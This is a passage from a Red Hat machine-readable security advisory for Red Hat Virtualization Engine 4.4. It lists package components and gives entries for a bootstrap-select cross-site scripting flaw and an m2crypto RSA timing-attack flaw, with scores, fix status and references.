"name": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ovirt-engine-lib@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"product": {
"name": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"product_id": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rhvm@4.4.5.9-0.1.el8ev?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-0:1.4.6-2.el8ar.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch"
},
"product_reference": "ansible-runner-0:1.4.6-2.el8ar.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-0:1.4.6-2.el8ar.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src"
},
"product_reference": "ansible-runner-0:1.4.6-2.el8ar.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch"
},
"product_reference": "ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-runner-service-0:1.0.7-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src"
},
"product_reference": "ansible-runner-service-0:1.0.7-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-sshd-0:2.6.0-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch"
},
"product_reference": "apache-sshd-0:2.6.0-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-sshd-0:2.6.0-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src"
},
"product_reference": "apache-sshd-0:2.6.0-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch"
},
"product_reference": "apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src"
},
"product_reference": "ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src"
},
"product_reference": "ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch"
},
"product_reference": "ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch"
},
"product_reference": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
},
"product_reference": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch"
},
"product_reference": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhvm-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2019-20921",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2020-09-24T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1882273"
}
],
"notes": [
{
"category": "description",
"text": "bootstrap-select before 1.13.6 allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim\u0027s browser.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nodejs-bootstrap-select: not escaping title values on \u003coption\u003e may lead to XSS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Service Mesh (OSSM) the openshift-service-mesh/kiali-rhel7 container (which installs the kiali rpm) is behind OpenShift OAuth authentication restricting access to the vulnerable bootstrap-select library to authenticated users only, therefore the impact is low.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-20921"
},
{
"category": "external",
"summary": "RHBZ#1882273",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1882273"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20921"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-20921",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20921"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-9r7h-6639-v5mw",
"url": "https://github.com/advisories/GHSA-9r7h-6639-v5mw"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JS-BOOTSTRAPSELECT-570457",
"url": "https://snyk.io/vuln/SNYK-JS-BOOTSTRAPSELECT-570457"
}
],
"release_date": "2019-02-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "nodejs-bootstrap-select: not escaping title values on \u003coption\u003e may lead to XSS"
},
{
"cve": "CVE-2020-25657",
"cwe": {
"id": "CWE-203",
"name": "Observable Discrepancy"
},
"discovery_date": "2020-10-19T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1889823"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in all released versions of m2crypto, where they are vulnerable to Bleichenbacher timing attacks in the RSA decryption API via the timed processing of valid PKCS#1 v1.5 Ciphertext. The highest threat from this vulnerability is to confidentiality.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "m2crypto: bleichenbacher timing attacks in the RSA decryption API",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
